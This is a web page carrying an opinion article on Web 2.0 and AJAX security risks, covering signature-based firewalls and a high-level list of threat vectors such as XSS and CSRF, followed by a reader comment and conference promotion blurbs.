Welcome!

You will be redirected in 30 seconds or close now.

ColdFusion Authors: Yakov Fain, Jeremy Geelan, Maureen O'Gara, Nancy Y. Nee, Tad Anderson

Related Topics: ColdFusion, Machine Learning , Agile Computing

ColdFusion: Article

Did You Get the Web 2.0 Memo?

No, you did not miss the memo or a software upgrade notice, yet you've already arrived at Web 2.0

What’s Secure?
When discussing Web 2.0 security, keep this dynamic in mind: AJAX is not insecure but many insecure Websites today are built with AJAX.

Over time, we have vetted the majority of security issues with the underlying protocols for Web 1.0. Today, however, the layering of new next-generation programming languages on top of these protocols in Web 2.0 has given the Internet’s bad guys a whole new set of opportunities to exploit. A great example of this would, of course, be AJAX , the popular Web 2.0 programming language. The asynchronous nature of AJAX clearly improves the users experience on a Website by taking interactivity to an entirely new level. However, it also dramatically increases the chances that things can go terribly wrong from a security perspective.

Here’s why: older synchronous programming languages restricted interaction to that of a defined and orderly format – safeguarding us all from security chaos. In stark contrast, AJAX operates asynchronously, whereby actions do not necessarily follow a defined orderly format. The result: it’s nearly impossible to fully vet out any potential bugs that could result in security issues. All of the risks associated with any programming language (such as race conditions, code correctness, object violations, and incorrect error handling) are amplified significantly when operating in an asynchronous environment such as that provided by AJAX.

The mere use of AJAX in Web 2.0 applications can increase the possible threat envelope due to the increased interactivity with the user’s browser. Further, if the Website-based AJAX program also needs to interact with the JavaScript that runs on the user’s browser, an additional security risk is now added to the risk equation.

Some pundits argue that AJAX by-and-of-itself is not at fault and that AJAX does not increase the threat envelope. Instead, they would argue, the real issue is AJAX programmers. By using AJAX to increase application functionality, the programmer theoretically increases the possible number of server-side vulnerabilities. This argument actually supports my original position. I never said bugs within AJAX were causing the threat envelope problem. I clearly said it is the “use” of AJAX that increases the possible threat envelope.

One final point on AJAX: it is relatively new, and secure programming standards have not yet been fully vetted. As a result, traditional Website vulnerabilities to attacks like XSS (Cross Site Scripting) could start re-appearing in Web 2.0 Websites.

Consider this: the worm that was used to attack MySpace (enabled by AJAX), as well as the worm that was used to attack Yahoo! (also enabled by AJAX), both took advantage of a component of AJAX called XHR to help propagate the worms.

Déjà vu – Are We Building Yet Another Bubble?
Web 2.0 certainly allows us all to innovate on the Internet. Unfortunately, similar to what happened in the early 1990’s Internet boom, businesses and individuals are rushing the deployment of these new Web capabilities and features with little, if any, regard to security.

Hence, we find ourselves in a position now, due in large part to rushed Web 2.0 implementations, that the Internet is a much more dangerous place to be than it has ever been. Web-based e-mail providers, photo-sharing Websites, blogs, Wikis, and social networking sites have all fallen victim to malicious hackers due to their lack of consideration of security in the “new” Web 2.0 world.

Internet Threat Vectors
In their quest to harness the power of the Internet, enterprises began increasing the connectivity of their internal applications to the Web. The threat vector originally involved layer 4 (the network layer) of the OSI model, where inspection is primarily limited to an IP address and port numbers in stateful packet filters. But the threat vector soon shifted to layer 7 (the application layer), where attackers could exploit the vulnerabilities of Internet-connected applications.

Now, for the problem: As the threat vector shifted from layer 4 to layer 7, our defenses simply did not keep pace,

With the change in the threat vector, signatures for known attacks began to find their way into firewall security products. Some stateful packet filter vendors attempted to offer at least some level of application layer attack protection. This protection methodology is often called a Negative Security Model, whereby all traffic is allowed to flow freely and the protective mechanism uses the signature of known attacks layered on top of their Stateful packet filters. This approach attempts to enumerate potentially malicious traffic and to block it only once (and if) it has in fact been identified.

Unfortunately, the Negative Security Model is only reactive in nature. Admittedly, these products are marketed as being proactive because of their ability to automatically block an attack on behalf of the product user. However, a signature for a given attack must first be created before any defense against that particular attack can be afforded. As a result, the use of this methodology in reality is not at all proactive and is at best only a reactive methodology. In today’s environment, where over 6,000 application vulnerabilities are reported annually, vendors are having a difficult time maintaining defensive signatures for these known attacks.

What about all the unknown threats circulating across the Web? A recent study found that the typical vulnerability exists for up to 348 days before public disclosure. Hence the malicious hacker who found the vulnerability could potentially have free rein for nearly a year to exploit a vulnerability before a defensive signature can be created.

The problems don’t end there. In a recent article, IBM warned that there is a colossal difference between the number of vulnerabilities disclosed publicly and the number of vulnerabilities that are discovered and are not publicly reported. IBM has estimated that up to 139,362 vulnerabilities are discovered annually – but not reported publicly.

Remaining Application-Layer Risks with Web 2.0
Clearly, the increased functionality of Web 2.0 Websites along with the relatively new underlying programming languages are creating new threat vectors and revitalizing traditional threat vectors. The most common and “most concerning” threat vectors for Web 2.0 include:

  • Web-borne malware
  • Real-time RSS/Atom Feeds with JavaScript Malware inside
  • XSS Scripting (Cross Site Scripting) – e.g., MySpace Worm
  • CSRF (Cross Site Request Forgeries) – Stealing data in Java space, e.g., Gmail
  • XSS filter bypassing – ENCODING
  • Exponential XSS Attacks – No need to limit to one Website
  • Forging “request headers” using Flash
  • Backdooring Media Files – JavaScript in everything

More Stories By Paul A. Henry

Paul Henry is global information security expert, with more than 20 years' experience managing security initiatives for Global 2000 enterprises and government organizations worldwide. At Secure Computing, he plays a key strategic role in new product development and directions. In his role as vice president of technology evangelism, he also advises and consults on some of the world's most challenging and high-risk information security projects, including the National Banking System in Saudi Arabia, Department of Defense's Satellite Data Project, USA, and both government as well as telecommunications projects through out Japan.

Comments (1) View Comments

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.


Most Recent Comments
Julian 09/19/07 07:23:21 PM EDT

Awesome read - well done...
We recently wrote a blog post that's probably also of interest to readers on this topic. http://julian101.com/archives/88

It talks about Web2.0 and sheds some light on whether we're really at Web2.0 or Web 16.0...

Julian Stone - ProWorkflow.com

@ThingsExpo Stories
Amazon started as an online bookseller 20 years ago. Since then, it has evolved into a technology juggernaut that has disrupted multiple markets and industries and touches many aspects of our lives. It is a relentless technology and business model innovator driving disruption throughout numerous ecosystems. Amazon’s AWS revenues alone are approaching $16B a year making it one of the largest IT companies in the world. With dominant offerings in Cloud, IoT, eCommerce, Big Data, AI, Digital Assista...
Multiple data types are pouring into IoT deployments. Data is coming in small packages as well as enormous files and data streams of many sizes. Widespread use of mobile devices adds to the total. In this power panel at @ThingsExpo, moderated by Conference Chair Roger Strukhoff, panelists looked at the tools and environments that are being put to use in IoT deployments, as well as the team skills a modern enterprise IT shop needs to keep things running, get a handle on all this data, and deliver...
In his session at @ThingsExpo, Eric Lachapelle, CEO of the Professional Evaluation and Certification Board (PECB), provided an overview of various initiatives to certify the security of connected devices and future trends in ensuring public trust of IoT. Eric Lachapelle is the Chief Executive Officer of the Professional Evaluation and Certification Board (PECB), an international certification body. His role is to help companies and individuals to achieve professional, accredited and worldwide re...
With the introduction of IoT and Smart Living in every aspect of our lives, one question has become relevant: What are the security implications? To answer this, first we have to look and explore the security models of the technologies that IoT is founded upon. In his session at @ThingsExpo, Nevi Kaja, a Research Engineer at Ford Motor Company, discussed some of the security challenges of the IoT infrastructure and related how these aspects impact Smart Living. The material was delivered interac...
IoT solutions exploit operational data generated by Internet-connected smart “things” for the purpose of gaining operational insight and producing “better outcomes” (for example, create new business models, eliminate unscheduled maintenance, etc.). The explosive proliferation of IoT solutions will result in an exponential growth in the volume of IoT data, precipitating significant Information Governance issues: who owns the IoT data, what are the rights/duties of IoT solutions adopters towards t...
"When we talk about cloud without compromise what we're talking about is that when people think about 'I need the flexibility of the cloud' - it's the ability to create applications and run them in a cloud environment that's far more flexible,” explained Matthew Finnie, CTO of Interoute, in this SYS-CON.tv interview at 20th Cloud Expo, held June 6-8, 2017, at the Javits Center in New York City, NY.
The Internet giants are fully embracing AI. All the services they offer to their customers are aimed at drawing a map of the world with the data they get. The AIs from these companies are used to build disruptive approaches that cannot be used by established enterprises, which are threatened by these disruptions. However, most leaders underestimate the effect this will have on their businesses. In his session at 21st Cloud Expo, Rene Buest, Director Market Research & Technology Evangelism at Ara...
No hype cycles or predictions of zillions of things here. IoT is big. You get it. You know your business and have great ideas for a business transformation strategy. What comes next? Time to make it happen. In his session at @ThingsExpo, Jay Mason, Associate Partner at M&S Consulting, presented a step-by-step plan to develop your technology implementation strategy. He discussed the evaluation of communication standards and IoT messaging protocols, data analytics considerations, edge-to-cloud tec...
New competitors, disruptive technologies, and growing expectations are pushing every business to both adopt and deliver new digital services. This ‘Digital Transformation’ demands rapid delivery and continuous iteration of new competitive services via multiple channels, which in turn demands new service delivery techniques – including DevOps. In this power panel at @DevOpsSummit 20th Cloud Expo, moderated by DevOps Conference Co-Chair Andi Mann, panelists examined how DevOps helps to meet the de...
When growing capacity and power in the data center, the architectural trade-offs between server scale-up vs. scale-out continue to be debated. Both approaches are valid: scale-out adds multiple, smaller servers running in a distributed computing model, while scale-up adds fewer, more powerful servers that are capable of running larger workloads. It’s worth noting that there are additional, unique advantages that scale-up architectures offer. One big advantage is large memory and compute capacity...
With major technology companies and startups seriously embracing Cloud strategies, now is the perfect time to attend 21st Cloud Expo October 31 - November 2, 2017, at the Santa Clara Convention Center, CA, and June 12-14, 2018, at the Javits Center in New York City, NY, and learn what is going on, contribute to the discussions, and ensure that your enterprise is on the right path to Digital Transformation.
Artificial intelligence, machine learning, neural networks. We’re in the midst of a wave of excitement around AI such as hasn’t been seen for a few decades. But those previous periods of inflated expectations led to troughs of disappointment. Will this time be different? Most likely. Applications of AI such as predictive analytics are already decreasing costs and improving reliability of industrial machinery. Furthermore, the funding and research going into AI now comes from a wide range of com...
Internet of @ThingsExpo, taking place October 31 - November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA, is co-located with 21st Cloud Expo and will feature technical sessions from a rock star conference faculty and the leading industry players in the world. The Internet of Things (IoT) is the most profound change in personal and enterprise IT since the creation of the Worldwide Web more than 20 years ago. All major researchers estimate there will be tens of billions devic...
We build IoT infrastructure products - when you have to integrate different devices, different systems and cloud you have to build an application to do that but we eliminate the need to build an application. Our products can integrate any device, any system, any cloud regardless of protocol," explained Peter Jung, Chief Product Officer at Pulzze Systems, in this SYS-CON.tv interview at @ThingsExpo, held November 1-3, 2016, at the Santa Clara Convention Center in Santa Clara, CA
SYS-CON Events announced today that Ayehu will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place on October 31 - November 2, 2017 at the Santa Clara Convention Center in Santa Clara California. Ayehu provides IT Process Automation & Orchestration solutions for IT and Security professionals to identify and resolve critical incidents and enable rapid containment, eradication, and recovery from cyber security breaches. Ayehu provides customers greater control over IT infras...
SYS-CON Events announced today that MobiDev, a client-oriented software development company, will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place October 31-November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. MobiDev is a software company that develops and delivers turn-key mobile apps, websites, web services, and complex software systems for startups and enterprises. Since 2009 it has grown from a small group of passionate engineers and business...
SYS-CON Events announced today that GrapeUp, the leading provider of rapid product development at the speed of business, will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place October 31-November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. Grape Up is a software company, specialized in cloud native application development and professional services related to Cloud Foundry PaaS. With five expert teams that operate in various sectors of the market acr...
SYS-CON Events announced today that Enzu will exhibit at SYS-CON's 21st Int\ernational Cloud Expo®, which will take place October 31-November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. Enzu’s mission is to be the leading provider of enterprise cloud solutions worldwide. Enzu enables online businesses to use its IT infrastructure to their competitive advantage. By offering a suite of proven hosting and management services, Enzu wants companies to focus on the core of their ...
SYS-CON Events announced today that Cloud Academy named "Bronze Sponsor" of 21st International Cloud Expo which will take place October 31 - November 2, 2017 at the Santa Clara Convention Center in Santa Clara, CA. Cloud Academy is the industry’s most innovative, vendor-neutral cloud technology training platform. Cloud Academy provides continuous learning solutions for individuals and enterprise teams for Amazon Web Services, Microsoft Azure, Google Cloud Platform, and the most popular cloud com...
SYS-CON Events announced today that IBM has been named “Diamond Sponsor” of SYS-CON's 21st Cloud Expo, which will take place on October 31 through November 2nd 2017 at the Santa Clara Convention Center in Santa Clara, California.